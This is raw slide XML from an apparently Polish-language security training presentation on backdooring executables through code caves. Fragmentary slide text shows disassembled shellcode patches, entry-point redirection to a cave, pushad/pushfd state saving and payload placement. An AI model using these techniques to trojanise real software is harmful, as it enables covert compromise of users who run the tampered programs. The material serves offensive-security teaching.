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60" r:id="rId2"/>
    <p:sldId id="261" r:id="rId3"/>
    <p:sldId id="262" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="279" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="294" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="282" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="290" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="274" r:id="rId28"/>
    <p:sldId id="277" r:id="rId29"/>
    <p:sldId id="278" r:id="rId30"/>
    <p:sldId id="292" r:id="rId31"/>
    <p:sldId id="293" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000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58408E-3DB2-FDA7-3E29-8A6980A298B3}" name="Marzena Wróbel" initials="MW" userId="Marzena Wróbe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4"/>
    <a:srgbClr val="3CB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C5A4B-9B30-4FF9-A50F-1D5A1C2CBA93}" v="39" dt="2022-06-17T13:11:17.961"/>
    <p1510:client id="{BBEBCBAE-6F67-4EF4-A765-7E2A03EB5A25}" v="1" dt="2022-06-23T19:12:39.961"/>
    <p1510:client id="{C109465C-94FC-40D2-B01D-7902E11312EB}" v="99" dt="2022-10-15T10:48:12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8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84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0679787-01F7-490B-B988-A21EFC1D3EC7}" type="datetimeFigureOut">
              <a:rPr lang="pl-PL"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17.10.2022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C035308-67A3-4A0A-AE7A-E2E0D50F4B52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l-PL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BC5F57B3-4DDB-43D2-80B9-3C7F0DAC4EF9}" type="datetimeFigureOut">
              <a:rPr lang="pl-PL"/>
              <a:pPr/>
              <a:t>17.10.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="pl-PL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pl-PL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7BDF979-311F-489D-BD97-312305376BE8}" type="slidenum">
              <a:rPr lang="pl-PL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244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ytuł 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3469532" y="3891586"/>
            <a:ext cx="8722468" cy="98587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NAJCIEMNIEJ W JASKINI</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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38" name="Podtytuł 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5559879" y="4512187"/>
            <a:ext cx="6534366" cy="50884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r">
              <a:buNone/>
            </a:pP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backdoorowanie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="74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 przy użyciu </a:t>
            </a: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pl-PL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="74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i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="74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Caves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="74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możliwości ich zagospodarowania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CC02793-269B-4452-F0D5-88F941964DDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5559879" y="6098780"/>
            <a:ext cx="6534366" cy="3319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charset="0"/>
              <a:buNone/>
            </a:pP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RedCode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Labs</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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140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MODYFIKACJA SHELLCODU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E6D0F18-C847-8468-68EE-DEDD05B9AE36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="988952"/>
            <a:ext cx="3663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ndisasm.exe -b 32 .\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shellcode.bin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A4180504-9CAA-F22D-DF95-DADE46FEB967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285751" y="4378816"/>
            <a:ext cx="31341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00000142 | FFD5 | call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebp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8DBEDE7-E3E7-6DBA-E7EE-7BB8C149EE67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247746" y="4395318"/>
            <a:ext cx="23062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00000142 | 90 |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00000143 | 90 |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1CEFFA57-7A9A-695F-D8E7-52765B6E0F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419857" y="4541369"/>
            <a:ext cx="73390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9EE3908-B774-6234-DC87-58D39BFECDCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372752" y="1741118"/>
            <a:ext cx="33265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DWORD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WaitForSingleObject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[in] HANDLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hHandle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[in] DWORD  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="ED1B24"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dwMilliseconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="ED1B24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E4D3A13B-6B19-498B-A995-20CCD1CCB1F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="372752" y="2822206"/>
            <a:ext cx="3961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nsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WaitForSingleObject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hHandle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, -1);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2B8DB1-32EA-3EF9-6A44-54AC1AF5C735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4866824" y="2606762"/>
            <a:ext cx="574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ED1B24"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>∞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ED1B24"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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31D3B3CE-BE64-1343-5F35-3DCCF7A1AB28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240762" y="2991483"/>
            <a:ext cx="608975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439A2928-8CBA-BE3C-D62C-5D7CBDABA60F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285751" y="3860391"/>
            <a:ext cx="281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00000119 | 4E | dec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/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03C64A7-EC5C-46EA-CE7F-8EFB21379C2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3096116" y="4029668"/>
            <a:ext cx="733904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A4DB1EE0-4BB9-ECED-1E75-34992831AA55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3853520" y="3854495"/>
            <a:ext cx="28103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00000119 | 90 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop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4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1688319" y="3044279"/>
            <a:ext cx="88153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PODSTAWOWY BACKDOORING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4701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67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PODSTAWOWY BACKDOORING</a:t>
            </a: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78FD175A-4697-9690-E3A3-1625ACCC6B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983913" y="3196575"/>
            <a:ext cx="5112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00493AEB | E8 56020000 | call 0x00493D46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sz="1400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ebp,esp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0191326-7F8F-865C-178A-6C5DC160FF33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="841627"/>
            <a:ext cx="153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CAVE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9D496C-9DF8-A252-6FE9-67FFCF08B965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="1255590"/>
            <a:ext cx="2084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VA: 0x004F32D6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Size: 699 bytes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309204" y="2559212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HIJACKING THE EXECUTION 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A01BAE0-9FB6-29F0-3EA5-A5D3BE031E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8754787" y="1219489"/>
            <a:ext cx="18940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004F32D6 |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004F358F |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0000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Łącznik: zakrzywiony 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BA2C10-44B2-FD59-048D-F52D912C8898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="8519665" y="1870111"/>
            <a:ext cx="1561587" cy="1091342"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36696"/>
              <a:gd name="adj2" fmla="val 120947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7916B79E-ADE7-081A-881E-928D193A6147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22508" y="3196575"/>
            <a:ext cx="1019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3CB5EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entry point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54D9666-CD6A-5AED-2D56-B5B69FE3DC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426927" y="3196575"/>
            <a:ext cx="5525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00493AEB | E9 E6F70500 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1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 0x004F32D6 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sz="1400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ebp,esp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C6C7B20-0106-364D-E25A-E7E1EEB7ABF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8754787" y="746775"/>
            <a:ext cx="1539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CAVE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4518D74-76BA-3700-7F92-63766ADFE20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176157" y="3350463"/>
            <a:ext cx="122833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rostokąt 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{436C4340-9D2F-7847-A393-9492CC9279BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026166" y="3240856"/>
            <a:ext cx="4027528" cy="219214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="ED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9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67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PODSTAWOWY BACKDOORING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2E54239-5E8F-3979-3C00-A93F190B9BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7692245" y="649224"/>
            <a:ext cx="2027828" cy="58521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415D637C-690D-FEBE-843E-74B71D6638DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7798472" y="4514954"/>
            <a:ext cx="1815374" cy="1876629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ORYGINALNA ZAWARTOŚĆ STOSU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F7F00554-4055-DB48-FCD5-6F6AFEDA2492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="531026" y="2857452"/>
            <a:ext cx="1815374" cy="2097951"/>
            <a:chOff x="531026" y="2857452"/>
            <a:chExt cx="1815374" cy="2097951"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Prostokąt 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16311C65-22A8-9EC4-9E78-9167388D4936}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="2857452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EAX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Prostokąt 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7EAD3A-B68F-2374-71D4-C0C5A6B663DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="3122604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ECX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Prostokąt 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40F5275-2720-8AA0-854B-92576E39C56A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="3386583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EDX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5637D75D-0616-2529-3019-2290578BA4AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="3650562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EBX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1687BF9A-6F8A-0A16-D401-026DA558C094}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="3920539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ESP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85508AE8-9369-0DE3-5D0C-5AAB56ECB880}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="4190516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EBP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A2300355-7757-10F6-D4BB-E08C887A6F24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="4455849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ESI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60035097-3BF2-D1B8-7A5E-759F95F099E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531026" y="4721182"/>
              <a:ext cx="1815374" cy="234221"/>
            </a:xfrm>
            <a:prstGeom prst="rect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EDI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Prostokąt 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905D247-90BA-7FFA-468F-558BFC428777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111636" y="2589364"/>
            <a:ext cx="1815374" cy="425244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EFLAGS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D4B83ED-361E-DBDF-4FC5-DF9A2DB41997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439586" y="1950407"/>
            <a:ext cx="1815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rejestry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ogólnego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przeznaczenia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E4228F3B-C41A-3C6F-686A-79493FCB3B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4111636" y="1950407"/>
            <a:ext cx="1815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rejestr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EFLAGS</a:t>
            </a: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FA4967E6-D227-F51B-DE4E-974871946A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367393" y="882606"/>
            <a:ext cx="2300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PUSHAD I PUSHFD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051497DB-446B-6644-1318-30FE57DF0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35" y="3280146"/>
            <a:ext cx="3305636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6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0.59609 -0.0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05" y="-37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30234 -0.1240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17" y="-620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80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PODSTAWOWY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322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UMIESZCZENIE PAYLOADA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3C5218-07DC-7E9D-972E-93903C7E9E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121284" y="1555643"/>
            <a:ext cx="63528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004F32D6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60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pushad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004F32D7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pushfd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004F32D8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FC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cld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004F3419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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>53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D1B24"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push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004F341A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004F341B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6DB75F5-1207-D82F-9A56-4FD50DED1748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007473" y="1581392"/>
            <a:ext cx="0" cy="22210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Nawias zamykający 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74BC68EA-7AED-02BF-B63C-3B2F0EE12852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2255520"/>
            <a:ext cx="144780" cy="1546892"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="ED1B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CD7D0829-3007-7AC8-0BD5-E09C8CAA4C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240780" y="2844300"/>
            <a:ext cx="1287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PAYLOAD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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B23FA29-B1D8-80C5-3519-212A48752ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4446125" y="1355277"/>
            <a:ext cx="2027828" cy="45060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67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PODSTAWOWY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80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STOS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FFEB65A2-30D1-234F-1E4F-00256299195B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4545977" y="3893162"/>
            <a:ext cx="1815374" cy="1876629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ORYGINALNA ZAWARTOŚĆ STOSU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Grupa 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6B4321-7C71-4511-9AE7-26D8C39E388B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6369760" y="3708423"/>
            <a:ext cx="2258122" cy="369332"/>
            <a:chOff x="6369760" y="3708423"/>
            <a:chExt cx="2258122" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="Łącznik prosty ze strzałką 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519AA839-3DA8-9313-FF9F-5273FAF4FF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9760" y="3893089"/>
              <a:ext cx="1556113" cy="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A9C75CA7-6AAB-F39B-CDE9-3CDEE51064A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7981551" y="3708423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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Prostokąt 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2D7F69-B0E5-496E-90DF-0F3FA8166895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554386" y="3247161"/>
            <a:ext cx="1815374" cy="567114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PUSHFD I PUSHAD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5FD7E1DB-0552-4B98-B2FB-65CB49937ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554386" y="2554698"/>
            <a:ext cx="1815374" cy="613045"/>
          </a:xfrm>
          <a:prstGeom prst="rect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PAYLOAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Grupa 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41ABCEC0-DC30-EEA1-EEA1-44378BB43BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2668659" y="2576221"/>
            <a:ext cx="1698616" cy="692463"/>
            <a:chOff x="2668659" y="2576221"/>
            <a:chExt cx="1698616" cy="692463"/>
          </a:xfrm>
        </p:grpSpPr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BE235BFA-C0B0-5208-8093-4A6553056E17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2668659" y="2654856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add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>esp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5" name="Strzałka: zakrzywiona w prawo 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE13C454-D955-9173-E7FF-9F08804D89A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3818635" y="2576221"/>
              <a:ext cx="548640" cy="692463"/>
            </a:xfrm>
            <a:prstGeom prst="curvedRightArrow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a 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
